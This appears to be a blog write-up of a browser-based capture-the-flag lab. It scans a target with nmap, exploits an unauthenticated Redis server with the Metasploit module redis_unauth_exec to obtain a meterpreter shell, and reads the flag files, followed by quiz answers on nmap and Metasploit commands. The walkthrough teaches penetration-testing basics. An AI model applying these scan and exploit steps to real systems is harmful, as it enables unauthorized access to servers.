I just stumbled accross this funny little browser game. It’s a nice idea of gamification where you can learn some IT-Security skills.
I thought I’ll give it a try, so let’s play đ
Start the lab to get a terminal on an attacker machine that has tools like Nmap, Metasploit, etc. installed. Your task is to get root on a target database server on the same network and in the process successfully complete the tasks on the left to win the cup!
Finding the IP of the target server:
Run «ip addr» on the shell to find all your interface IP addresses. One of the IPs will be in the range 192.X.Y.2. Your target server has the IP 192.X.Y.3
First let’s check in the terminal what ip address we have:
192.34.26.2 is our ip address. Our target must be 192.34.26.3
For the first flag we need to know on which port the redis server is running. Let’s perform a nmap scan.
nmap -sS -sV -p- 192.34.26.3
The redis server is running on port 6379 which is the first flag.
Let’s go over to the next puzzle…
For that we have to start the metasploit console…
and do a query for «redit» to check the available exploits…
The second flag must be: exploit/linux/redis/redis_unauth_exec
So let’s check if we can run this exploit against our target server that we can solve the next flag đ
use exploit/linux/redis/redis_unauth_exec
check 192.34.26.3
show options
During documentation, the lab crashed once. After restarting I got a new ip address. Therfore attacker and target ip changed…
set rhosts 192.60.1.3
set lhost 192.60.1.2
set srvhost 192.60.1.2
check
exploit
We have a meterpreter shell đ
Let’s see what we find. There is a file called flag, but no run sh shell script…
leaving the root directory and see what we have…
Ther’s the run.sh script
cat /run.sh
That’s the name of the service and our next flag
Last flag
cd /root
cat flag
Skills learned:
- basic commands of nmap
- basic commands of metasploit with exploiting a target
basic nmap commands:
First, how do you access the help menu?
-h
Often referred to as a stealth scan, what is the first switch listed for a ‹Syn Scan›?
-sS
Not quite as useful but how about a ‹UDP Scan›?
-sU
What about operating system detection?
-O
How about service version detection?
-sV
Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag?
-v
What about ‹very verbose›? (A personal favorite)
-vv
Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format?
-oX
Aggressive scans can be nice when other scans just aren’t getting the output that you want and you really don’t care how ‹loud› you are, what is the switch for enabling this?
-A
How do I set the timing to the max level, sometimes called ‹Insane›?
-T5
What about if I want to scan a specific port?
-p
How about if I want to scan every port?
-p-
What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run.
–script
What if I want to run all scripts out of the vulnerability category?
–script vuln
What switch should I include if I don’t want to ping the host?
-Pn
basic metasploit commands:
how do you start the metasploit console?
msfconsole
what command do you use to search for a specific exploit?
search «service or exploit name»
how do you use a specific exploit?
use /exploit/path
how do you check if a target is vulnerable after a exploit is loaded?
check «target ip address»
how do you get the option switches of a specific exploit?
show options
how do you show and use payloads of a specific exploit?
show payloads
set payload linux/…
how do you configure the exploit options?
set rhosts
set lhost
set srvhost
how do you run a specific exploit?
exploit
Schreib einen Kommentar